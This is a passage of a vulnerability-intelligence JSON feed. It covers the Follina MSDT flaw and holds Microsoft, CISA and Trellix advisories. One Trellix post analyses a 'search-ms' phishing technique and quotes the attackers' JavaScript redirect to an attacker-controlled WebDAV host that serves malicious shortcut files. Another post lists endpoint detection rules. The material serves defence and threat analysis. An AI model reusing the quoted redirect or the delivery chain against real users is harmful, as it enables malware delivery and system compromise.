enables unauthorized access to the MOVEit Transfer database.All these attacks were observed to be on the rise, posing a significant threat to users all over the world. For a detailed threat digest, download the pdf file here", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2023-06-13T06:58:42", "type": "hivepro", "title": "Actors, Threats and Vulnerabilities 5 June to 11 June 2023", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30190", "CVE-2023-34362"], "modified": "2023-06-13T06:58:42", "id": "HIVEPRO:6551149EE518F9D073E43B5017FE0F24", "href": "https://www.hivepro.com/actors-threats-and-vulnerabilities-5-june-to-11-june-2023/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "msrc": [{"lastseen": "2023-06-03T14:39:56", "description": "\u672c\u30d6\u30ed\u30b0\u306f Guidance for CVE-2022-30190 Microsoft Support Diagnostic Tool Vulnerability \u306e\u6284\u8a33\u7248\u3067\u3059\u3002\u6700\u65b0\u306e\u60c5\u5831\u306f\u539f\u6587\u3092\u53c2\u7167\u3057\u3066\u304f\u3060\u3055\u3044\u3002 2022 \u5e74 7 \u6708 12 \u65e5\u66f4\u65b0 : \u30de\u30a4\u30af", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-05-30T07:00:00", "type": "msrc", "title": "CVE-2022-30190 \u30de\u30a4\u30af\u30ed\u30bd\u30d5\u30c8 \u30b5\u30dd\u30fc\u30c8\u8a3a\u65ad\u30c4\u30fc\u30eb\u306e\u8106\u5f31\u6027\u306b\u95a2\u3059\u308b\u30ac\u30a4\u30c0\u30f3\u30b9", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30190"], "modified": "2022-05-30T07:00:00", "id": "MSRC:AA9DD4993698C2F7A48FCF9F2BB413F3", "href": "/blog/2022/05/guidance-for-cve-2022-30190-microsoft-support-diagnostic-tool-vulnerability-jp/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-12-06T16:14:32", "description": "UPDATE July 12, 2022: As part of the response by Microsoft, a defense in depth variant has been found and fixed in the Windows July cumulative updates. Microsoft recommends installing the July updates as soon as possible. Windows Version Link to KB article LInk to Catalog Windows 8.1, Windows Server 2012 R2 5015805 Download Windows Server 2012 5015805 Download Windows 7, Windows Server 2008 R2 5015805 Download Windows Server 2008 SP2 5015805 Download On Monday May 30, 2022, Microsoft issued CVE-2022-30190 regarding the Microsoft Support Diagnostic Tool (MSDT) in Windows vulnerability.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-05-30T07:00:00", "type": "msrc", "title": "Guidance for CVE-2022-30190 Microsoft Support Diagnostic Tool Vulnerability", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30190"], "modified": "2022-05-30T07:00:00", "id": "MSRC:0FAFC00A7C2E92F14C0652D2CD1D14D7", "href": "https://msrc.microsoft.com/blog/2022/05/guidance-for-cve-2022-30190-microsoft-support-diagnostic-tool-vulnerability/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-06-03T14:39:56", "description": "UPDATE July 12, 2022: As part of the response by Microsoft, a defense in depth variant has been found and fixed in the Windows July cumulative updates. Microsoft recommends installing the July updates as soon as possible. Windows Version Link to KB article LInk to Catalog Windows 8.1, Windows Server 2012 R2 5015805 Download Windows Server 2012 5015805 Download Windows 7, Windows Server 2008 R2 5015805 Download Windows Server 2008 SP2 5015805 Download On Monday May 30, 2022, Microsoft issued CVE-2022-30190 regarding the Microsoft Support Diagnostic Tool (MSDT) in Windows vulnerability.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-05-30T07:00:00", "type": "msrc", "title": "Guidance for CVE-2022-30190 Microsoft Support Diagnostic Tool Vulnerability", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30190"], "modified": "2022-05-30T07:00:00", "id": "MSRC:023FEF60BCC2EE0035211FC95DB999BC", "href": "/blog/2022/05/guidance-for-cve-2022-30190-microsoft-support-diagnostic-tool-vulnerability/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-07-12T18:25:24", "description": "UPDATE July 12, 2022: As part of the response by Microsoft, a defense in depth variant has been found and fixed in the Windows July cumulative updates. Microsoft recommends installing the July updates as soon as possible. Windows Version Link to KB article LInk to Catalog Windows 8.1, Windows Server 2012 R2 5015805 Download Windows \u2026\n\n[ Guidance for CVE-2022-30190 Microsoft Support Diagnostic Tool Vulnerability Read More \u00bb](<https://msrc-blog.microsoft.com/2022/05/30/guidance-for-cve-2022-30190-microsoft-support-diagnostic-tool-vulnerability/>)", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-05-30T23:25:16", "type": "msrc", "title": "Guidance for CVE-2022-30190 Microsoft Support Diagnostic Tool Vulnerability", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30190"], "modified": "2022-05-30T23:25:16", "id": "MSRC:4C56F4539ADD1B17DFD44549ADFEE2FF", "href": "https://msrc-blog.microsoft.com/2022/05/30/guidance-for-cve-2022-30190-microsoft-support-diagnostic-tool-vulnerability/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "cisa": [{"lastseen": "2022-06-03T13:56:12", "description": "Microsoft has released workaround guidance to address a remote code execution (RCE) vulnerability\u2014CVE-2022-30190, known as \"Follina\"\u2014affecting the Microsoft Support Diagnostic Tool (MSDT) in Windows. A remote, unauthenticated attacker could exploit this vulnerability to take control of an affected system. Microsoft has reported active exploitation of this vulnerability in the wild.\n\nCISA urges users and administrators to review Microsoft's [Guidance for CVE-2022-30190 Microsoft Support Diagnostic Tool Vulnerability](<https://msrc-blog.microsoft.com/2022/05/30/guidance-for-cve-2022-30190-microsoft-support-diagnostic-tool-vulnerability/>) and apply the necessary workaround. \n\nThis product is provided subject to this Notification and this [Privacy & Use](<https://www.dhs.gov/privacy-policy>) policy.\n\n**Please share your thoughts.**\n\nWe recently updated our anonymous [product survey](<https://www.surveymonkey.com/r/CISA-cyber-survey?product=https://us-cert.cisa.gov/ncas/current-activity/2022/05/31/microsoft-releases-workaround-guidance-msdt-follina-vulnerability>); we'd welcome your feedback.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-05-31T00:00:00", "type": "cisa", "title": "Microsoft Releases Workaround Guidance for MSDT \"Follina\" Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30190"], "modified": "2022-05-31T00:00:00", "id": "CISA:F30D0D7B72453DC3FC64D2AC1AA31F33", "href": "https://us-cert.cisa.gov/ncas/current-activity/2022/05/31/microsoft-releases-workaround-guidance-msdt-follina-vulnerability", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "trellix": [{"lastseen": "2022-06-03T00:00:00", "description": "![Trellix Threat Intelligence banner](https://www.trellix.com/en-us/img/newsroom/stories/trellix-intelligence.jpeg)\n\n# Trellix Global Defenders: Follina \u2014 Microsoft Office Zero-Day (CVE-2022-30190)\n\nBy Taylor Mullins, **Robin Noyce**, **Benjamin Marandel** \u00b7 June 3, 2022\n\nTrellix is continuing to monitor the threat activity associated with the Microsoft Office Zero-Day vulnerability that has been dubbed \u201cFollina.\u201d Chinese-linked Threat Actors are actively exploiting this zero-day vulnerability to execute malicious code remotely. At the time of this writing there is no official patch from Microsoft, but steps and protections can be put into place to mitigate against the attacks utilizing this Microsoft vulnerability.\n\n[Microsoft Windows Support Diagnostic Tool (MSDT) Remote Code Execution Vulnerability](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-30190>)\n\nThe method at which these attacks are taking place is using malicious Word documents that execute PowerShell commands via the Microsoft Diagnostic Tool (MSDT). The \u2018Follina\u2019 zero-day features a remote code execution that works without elevated privileges, does not require macro enablement to execute binaries or scripts, and can bypass Windows Defender detection. Opening a Microsoft Word document in preview mode in Explorer is another method to detonate the malicious code which provides a vector for the exploitation to take place outside of the Protected View that Microsoft is reporting will prevent the attack. Furthermore, it is a signed binary, which enables the code to bypass windows validation controls. The Follina vulnerability is exploitable with Office 2013, 2016, 2019, 2021, Office ProPlus and Office 365.\n\n## Microsoft recommended workaround for microsoft support diagnostic tool (MSDT)\n\nMicrosoft has released guidance on disabling the Microsoft Diagnostic Tool (MSDT) URL protocol. The Microsoft Support Diagnostic Tool (MSDT) is a tool designed to collect information to send to the Microsoft Support.\n\n[CISA: Microsoft Releases Workaround Guidance for MSDT \"Follina\" Vulnerability](<https://www.cisa.gov/uscert/ncas/current-activity/2022/05/31/microsoft-releases-workaround-guidance-msdt-follina-vulnerability>)\n\n![Workaround provided by Microsoft to mitigate against exploitation](https://www.trellix.com/en-us/img/newsroom/stories/trellix-global-defenders-follina-1.jpg) Figure 1. Workaround provided by Microsoft to mitigate against exploitation \n\n\n## Trellix product protections for follina vulnerability\n\nTrellix is continuing to add protections via threat feeds and content updates to the Trellix products as Indicators of Compromises (IOCs) and behavioral techniques are detected in the wild. In addition, there are initiative-taking steps that can further protect your environment against the attacks targeting the Follina zero-day vulnerability.\n\n![MITRE ATT&CK Matrix for Exploitation of Follina Vulnerability. Source: MVISION Insights](https://www.trellix.com/en-us/img/newsroom/stories/trellix-global-defenders-follina-2.jpg) Figure 2. MITRE ATT&CK Matrix for Exploitation of Follina Vulnerability. Source: MVISION Insights \n\n\n## Follina zero-day threat intelligence and hunting rules\n\nMVISION Insights is continually updated with the latest threat intelligence and known indicators that are being discovered related to the Microsoft zero-day vulnerability. Additionally, applying hunting rules and threat intelligence across the security stack is key for early detection and identification of the Tactics, Techniques, and Procedures (TTPs) associated with Follina.\n\n#### MVISION Insights Campaign Name - Follina \u2014 A Microsoft Office Code Execution Vulnerability\n\n![YARA, Snort, and Sigma Hunting Rules specific to Follina Vulnerability Source: MVISION Insights](https://www.trellix.com/en-us/img/newsroom/stories/trellix-global-defenders-follina-3.jpg) Figure 3. YARA, Snort, and Sigma Hunting Rules specific to Follina Vulnerability Source: MVISION Insights \n![Campaign overview and detections for Follina. Source: MVISION Insights](https://www.trellix.com/en-us/img/newsroom/stories/trellix-global-defenders-follina-4.jpg) Figure 4. Campaign overview and detections for Follina. Source: MVISION Insights \n![Follina Indicators of Compromise \$IOCs\$ and endpoint detections. Source: MVISION Insights](https://www.trellix.com/en-us/img/newsroom/stories/trellix-global-defenders-follina-5.jpg) Figure 5. Follina Indicators of Compromise (IOCs) and endpoint detections. Source: MVISION Insights \n![MVISION Insights API to pull Campaign Threat Intelligence for further correlation across data events.](https://www.trellix.com/en-us/img/newsroom/stories/trellix-global-defenders-follina-6.jpg) Figure 6. MVISION Insights API to pull Campaign Threat Intelligence for further correlation across data events. \n\n\n## Utilizing expert and behavioral rules in trellix endpoint security\n\nTrellix ENS Threat Prevention and Adaptive Threat Protection (ATP) monitor Microsoft Word process activity and the start of a child Command line processes is detected and blocked (if configured to) by ENS ATP. Trellix ENS can also block common processes like cmd.exe from being spawned by Microsoft Office applications in a suspicious manner. The following rules in Trellix ENS Exploit Prevention and Adaptive Threat Protection (ATP) are recommended to observe or block behavioral activity associated with exploitation techniques.\n\n**Exploit Prevention Signature 6113: T1055 - Fileless Threat: Reflective Self Injection \nExploit Prevention Signature 6127: Suspicious LSASS Access from PowerShell \nExploit Prevention Signature 6143: T1003 - Attempt to Dump Password Hash from SAM Database \nExploit Prevention Signature 8004: Fileless Threat: Malicious PowerShell Behavior Detected**\n\n**ATP Rule 239: Identify suspicious command parameter execution \nATP Rule 263: Detect processes accessing suspicious URLs \nATP Rule 301: Blocks cmd.exe from being spawned by office applications \nATP Rule 332: Prevent certutil.exe from downloading or decoding files with suspect extensions**\n\nThe Trellix Advanced Threat Research (ATR) team has also created the following ENS Expert Rule to prevent techniques associated with exploitation. Outlined below are several screenshots on how to create this specific Expert Rule in Trellix ENS. Per standard practice, we recommend that customers test this rule in Report Only before moving to Block mode.\n\n[Detect new code injection method in Microsoft Office CVE-2022-30190](<https://github.com/advanced-threat-research/Expert-Rules/blob/main/Block_Office_Code_Execution.md>)\n\n[How to Use Expert Rules in ENS to Prevent Malicious Exploits](<https://www.mcafee.com/blogs/other-blogs/mcafee-labs/using-expert-rules-in-ens-10-5-3-to-prevent-malicious-exploits/>)\n\n![Creation of the Expert Rule in the Trellix ENS Exploit Prevention Policy](https://www.trellix.com/en-us/img/newsroom/stories/trellix-global-defenders-follina-7.jpg) Figure 7. Creation of the Expert Rule in the Trellix ENS Exploit Prevention Policy \n![Creating specific Expert Rule for Microsoft Office \$CVE-2022-30190\$ in Trellix ENS](https://www.trellix.com/en-us/img/newsroom/stories/trellix-global-defenders-follina-8.jpg) Figure 8. Creating specific Expert Rule for Microsoft Office (CVE-2022-30190) in Trellix ENS \n\n\n## Hunting for suspicious behavior with MVISION EDR\n\nMVISION EDR has the capability to search across historical and real-time data on endpoints to identify specific activity associated with exploitation and the MSDT process. Several examples and queries are noted below for using Historical and Real-time searches to analyze the Microsoft Diagnostic Tool (MSDT) process activity and interaction with CMD and PowerShell.\n\n**Processes and HostInfo hostname where Processes name equals msdt.exe** \u2013 Real-time search query to locate activity specific to the Microsoft Diagnostic Tool (MSDT) process\n\n**ProcessName = msdt.exe** \u2013 Historical search string to locate prior activity from MSDT.exe across your endpoints even if they are currently offline.\n\n![MVISION EDR Real-time search to locate ongoing MSDT.exe activity](https://www.trellix.com/en-us/img/newsroom/stories/trellix-global-defenders-follina-9.jpg) Figure 9. MVISION EDR Real-time search to locate ongoing MSDT.exe activity \n![Figure 10. MVISION EDR Historical Search query across all endpoints either online or offline to locate prior MSDT.exe process activity](https://www.trellix.com/en-us/img/newsroom/stories/trellix-global-defenders-follina-10.jpg) Figure 10. MVISION EDR Historical Search query across all endpoints either online or offline to locate prior MSDT.exe process activity \n\n\n## Trellix network security platform signature release\n\nTrellix has released a User-Defined Signature (UDS) for the Network Security Platform (NSP) to provide an immediate solution to this security advisory. Trellix writes and tests these signatures with the objective of a quick turnaround.\n\n[Knowledge Center - REGISTERED - NSP Emergency UDS Release Notes - UDS-HTTP: Microsoft Support Diagnostic Tool Remote Code Execution Vulnerability (CVE-2022-30190) (mcafee.com)](<https://kcm.trellix.com/agent/index?page=content&id=KB95702>)\n\n## Additional resources\n\n[](<https://msrc-blog.microsoft.com/2022/05/30/guidance-for-cve-2022-30190-microsoft-support-diagnostic-tool-vulnerability/>)Microsoft: Guidance for CVE-2022-30190 Microsoft Support Diagnostic Tool Vulnerability \n[Huntress: Rapid Response: Microsoft Office RCE - \u201cFollina\u201d MSDT Attack](<https://www.huntress.com/blog/microsoft-office-remote-code-execution-follina-msdt-bug>) \n[Bleeping Computer: Windows MSDT zero-day now exploited by Chinese APT hackers](<https://www.bleepingcomputer.com/news/security/windows-msdt-zero-day-now-exploited-by-chinese-apt-hackers/>)\n", "cvss3": {}, "published": "2022-06-03T00:00:00", "type": "trellix", "title": "Trellix Global Defenders: Follina \u2014 Microsoft Office Zero-Day (CVE-2022-30190)", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2022-30190"], "modified": "2022-06-03T00:00:00", "id": "TRELLIX:1B98406D173663FA7B8E48F103AAE482", "href": "https://www.trellix.com/content/mainsite/en-us/about/newsroom/stories/research/follina-microsoft-office-zero-day-cve-2022-30190.html", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-07-26T00:00:00", "description": "# Beyond File Search: A Novel Method for Exploiting the \"search-ms\" URI Protocol Handler\n\nBy Mathanraj Thangaraju and Sijo Jacob \u00b7 July 26, 2023\n\n## Threat Summary\n\nIn the ever-evolving landscape of cyber threats, malware authors continuously explore new avenues to exploit unsuspecting users. The Windows operating system provides a powerful search feature that allows users to quickly find files, folders, and other items on their computers. One of the less known aspects of this search feature is the \"[search-ms](<https://learn.microsoft.com/en-us/windows/win32/search/getting-started-with-parameter-value-arguments>)\" URI protocol handler, which offers enhanced search capabilities to perform local searches. It also offers the capability to perform queries on file shares located on remote hosts, this can be exploited, as explained in our Trellix Research [blog](<https://www.trellix.com/en-in/about/newsroom/stories/research/countering-follina-attack-with-network-security-platforms-advanced-detection-features.html>).\n\nIn an exciting discovery, Trellix Advanced Research Center has uncovered a novel attack technique leveraging the \u201csearch-ms\u201d URI protocol handler. While we were already aware of attackers exploiting the \u201csearch-ms\u201d URI protocol handler through malicious documents, our investigation has revealed an advancement in their approach. We have discovered that attackers are directing users to websites that exploit the \u201csearch-ms\u201d functionality using JavaScript hosted on the page. This technique has even been extended to HTML attachments, expanding the attack surface. In our research, we have not only explored the capabilities of \"search-ms\" protocol but also the \u201c[search](<https://learn.microsoft.com/en-us/previous-versions/windows/desktop/legacy/cc144083\$v=vs.85\$#syntax>)\u201d protocol. The \u201csearch\u201d application protocol was created in Windows Vista with SP1 and later versions. The operating system uses the search protocol to launch the default desktop search application. Leveraging the power of both protocols, we successfully utilized the search functionality in various script files, including Batch, Visual Basic, PHP, and PowerShell. This demonstrates the versatility and effectiveness of this attack technique, harnessing the features of both search protocols to carry out malicious activities.\n\nDuring an attack leveraging the \u201csearch\u201d / \u201csearch-ms\u201d URI protocol handler, threat actors may create deceptive emails containing hyperlinks or email attachments that redirect users to compromised websites. When users visit the website, malicious Java scripts initiate searches on a remote server using the \u201csearch\u201d / \"search-ms\" URI protocol handler. The search results of remotely hosted Malicious shortcut files are displayed in Windows Explorer disguised as PDFs or other trusted icons, just like local search results. This smart technique conceals the fact that the user is being provided with remote files and gives the user the illusion of trust. As a result, the user is more likely to open the file, assuming it is from their own system, and unknowingly execute malicious code.\n\nIn this blog, we aim to provide a comprehensive understanding of how threat actors leverage the \u201csearch-ms\u201d URI protocol handler as a vehicle for their malicious activities and steps involved from initial delivery to payload execution.\n\n## Infection Chain\n\n![Figure 1: Execution flow of the attack](https://www.trellix.com/en-us/img/newsroom/stories/beyond-file-search-a-novel-method-1.jpg) Figure 1: Execution flow of the attack \n\n\n## Real-World Phishing Examples\n\nTrellix Advanced Research Center has observed phishing emails making use of the \"search-ms\" URI protocol handler to download malicious payload. These phishing emails are trying to trick the recipient into clicking on a malicious link by pretending to be an urgent request for quotation from sales manager. \n\n![Figure 2: Sample phishing emails](https://www.trellix.com/en-us/img/newsroom/stories/beyond-file-search-a-novel-method-2.jpg) Figure 2: Sample phishing emails \n\n\nIn our research, we encountered other forms of attack variants such as utilization of emails with HTML or PDF attachments. These attachments contained URLs leading to compromised website hosting scripts that incorporated the \u2018search-ms\u201d URI protocol handler. In addition, HTML files can also initiate the attack by embedding scripts that trigger the execution of \u201csearch-ms\u201d URI protocol handler.\n\n![Figure 3: PDF files with URL containing the \u201csearch-ms\u201d URI protocol handler](https://www.trellix.com/en-us/img/newsroom/stories/beyond-file-search-a-novel-method-3.jpg) Figure 3: PDF files with URL containing the \u201csearch-ms\u201d URI protocol handler \n\n\nUpon clicking the link in email or attachment, recipient would be redirected to the website abusing \u201csearch-ms\u201d URI protocol handler. Below we see the GET request for page.html from Figure 2 highlighting the suspicious script:\n\n![Figure 4: HTML with \u201csearch-ms\u201d URI Protocol Handler](https://www.trellix.com/en-us/img/newsroom/stories/beyond-file-search-a-novel-method-4.jpg) Figure 4: HTML with \u201csearch-ms\u201d URI Protocol Handler \n\n### Invisible Threats: Demystifying the Dark Side of \u201cSearch-MS\u201d URI Protocol Handler\n\nThe code snippet highlighted in above figure invokes the \u201csearch-ms\u201d URI protocol handler to perform a search operation on an attacker-controlled server. Let us break down the code and understand its components:\n\n * <script></script>: This code is encapsulated within the <script> tags, which denote JavaScript code within an HTML document.\n * window.location.href: This JavaScript statement refers to the current URL or location of the web page. By modifying this property, we can redirect the user to a different location. \n * 'search-ms:query=Review&crumb=location:\\\\\\dhqidfvyxawy0du9akl2ium[.]webdav[.]drivehq[.]com@SSL\\DavWWWRoot&displayname=Search': This is the value assigned to the window.location.href property. It represents the target URL or location where the user will be redirected. \n * search-ms: This is the protocol identifier that signifies the use of the Windows Search protocol\n * query=Review: The \"query\" parameter specifies the search criteria, which in this case is set to \"Review\". It indicates that the search operation will focus on finding items related to the term \"Review\".\n * crumb=location:\\\\\\dhqidfvyxawy0du9akl2ium[.]webdav[.]drivehq[.]com@SSL\\DavWWWRoot: The \"crumb\" parameter defines the location or path constraint for the search. The value \"location:\\\\\\ dhqidfvyxawy0du9akl2ium[.]webdav[.]drivehq[.]com@SSL\\DavWWWRoot\" specifies the specific location or folder path where the search should be performed. \n * displayname=Search: The \"displayname\" parameter sets a custom name for the search query, which in this case is \"Search.\" \n\nPutting it all together, the code sets the window.location.href property to initiate a search operation using the \u201csearch-ms\u201d URI protocol handler. The search will look for items related to \"Review\" within the specified location which here is the remote file server.\n\n### Behind the Click: Understanding User Interaction\n\nOnce the email recipient clicks on the malicious link, \"Open Windows Explorer\" warning typically appears as a clickable button. By clicking on it, the user can navigate to the folder or directory where the files matching the search query are stored.\n\n![Figure 5: Warning to Open Windows Explorer](https://www.trellix.com/en-us/img/newsroom/stories/beyond-file-search-a-novel-method-5.jpg) Figure 5: Warning to Open Windows Explorer \n\n\nIf user allows to Open Windows Explorer, then depending upon the operations to be performed several requests are sent to the server. From Figure 6, we observe the OPTIONS request which is sent to retrieve the available methods and features supported by the server.\n\n![Figure 6: Options request](https://www.trellix.com/en-us/img/newsroom/stories/beyond-file-search-a-novel-method-6.jpg) Figure 6: Options request \n\n\nFurther we see usage of PROPFIND method, which allows to retrieve metadata or properties associated with a resource or collection on the server. These properties can include information such as the resource's name, size, creation date, modification date, and other custom-defined attributes. This method is used to find items related to the term \"Review\u201d as mentioned in Figure 4 (query=Review). In most cases, the search would start from the root of the directory and the recursive behaviour of the PROPFIND method in retrieving item may vary depending on the server's settings:\n\n![Figure 7: PROPFIND method to find items related to term \u201cReview\u201d](https://www.trellix.com/en-us/img/newsroom/stories/beyond-file-search-a-novel-method-7.jpg) Figure 7: PROPFIND method to find items related to term \u201cReview\u201d \n\n\nThe response received for a PROPFIND method on a file in WebDAV is typically an XML-formatted response that contains the requested properties or metadata of the file. The exact structure and content of the XML response may vary depending on the WebDAV server implementation and the specific properties requested. However, the response includes elements and attributes representing the properties of the file.\n\n![Figure 8: PROPFIND method response](https://www.trellix.com/en-us/img/newsroom/stories/beyond-file-search-a-novel-method-8.jpg) Figure 8: PROPFIND method response \n![ Figure 9: XML Format PROPFIND method response](https://www.trellix.com/en-us/img/newsroom/stories/beyond-file-search-a-novel-method-9.jpg) Figure 9: XML Format PROPFIND method response \n\n\nOn receiving properties of the shortcut file (Review_200630_DeletedItem.lnk), GET method is used to retrieve the content of the file.\n\n![Figure 10: Retrieving shortcut file with GET method](https://www.trellix.com/en-us/img/newsroom/stories/beyond-file-search-a-novel-method-10.jpg) Figure 10: Retrieving shortcut file with GET method \n\n\nBased on the parameters provided in the \u201csearch-ms\u201d query mentioned in Figure 4, Windows Explorer window displays below search result for items related to \"Review\".\n\n![Figure 11: Windows Explorer window with the search result](https://www.trellix.com/en-us/img/newsroom/stories/beyond-file-search-a-novel-method-11.jpg) Figure 11: Windows Explorer window with the search result \n\n\nFew of the other shortcut files used in this attack is shown in Figure 12. Attacker\u2019s employ various tactics to trick unsuspecting victims, and one such method involves manipulating icons and file names for shortcut files. These deceptive techniques are carefully crafted to exploit human psychology and lure users into interacting with malicious content. By assigning icons that resemble legitimate applications and choosing file names that appear urgent or important, attackers aim to instil a false sense of trust and urgency. Also, each variation of the shortcut file may have a unique signature or fingerprint, making it harder for security tools to identify and block them.\n\n![Figure 12: Windows Explorer showing different shortcut files based on search keyword](https://www.trellix.com/en-us/img/newsroom/stories/beyond-file-search-a-novel-method-12.jpg) Figure 12: Windows Explorer showing different shortcut files based on search keyword \n\n\nIf the victim clicks on the opened shortcut file, then the malicious DLL file referenced in the command line is executed using the regsvr32.exe utility.\n\n![FFigure 13: Shortcut file command](https://www.trellix.com/en-us/img/newsroom/stories/beyond-file-search-a-novel-method-13.jpg) Figure 13: Shortcut file command \n![Figure 14: DLL file retrieved using PROPFIND and GET 